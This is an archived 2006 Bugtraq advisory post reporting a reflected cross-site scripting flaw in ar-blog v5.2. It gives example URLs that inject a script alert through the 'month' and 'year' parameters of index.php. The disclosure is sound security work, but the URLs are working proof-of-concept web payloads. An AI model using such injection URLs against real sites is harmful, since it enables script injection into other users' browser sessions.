[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

-2- [XSS] in ar-blog v 5.2

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: -2- [XSS] in ar-blog v 5.2
From: s3ude@xxxxxxxxxxx
Date: 18 Jan 2006 13:52:58 -0000

Software: ar-blog 
Web Site: http://www.ar-blog.com
Versions: ar-blog v 5.2
Type: Cross Site Scripting
Class: Remote



Exploit : 

1-

http://www.target.com/index.php?page=showtopis&month=[XSS]&year=1426&all=9

2-

http://www.target.com/index.php?page=showtopis&month=9&year=[XSS]&all=9

Example : 

1-

http://www.target.com/index.php?page=showtopis&month=<script>alert("www.LeZr.Com")</script>

2- 

http://www.target.com/index.php?page=showtopis&month=9&year=<script>alert("www.LeZr.Com")</script>&all=9

Discovered by: SAUDI

L-G-H Team

http://www.lezr.com

Regards ///

Prev by Date: CAID 33756 - DM Deployment Common Component Vulnerabilities
Next by Date: Google's Blogger.com classic HTTP response splitting vulnerability
Previous by thread: CAID 33756 - DM Deployment Common Component Vulnerabilities
Next by thread: Google's Blogger.com classic HTTP response splitting vulnerability
Index(es):
- Date
- Thread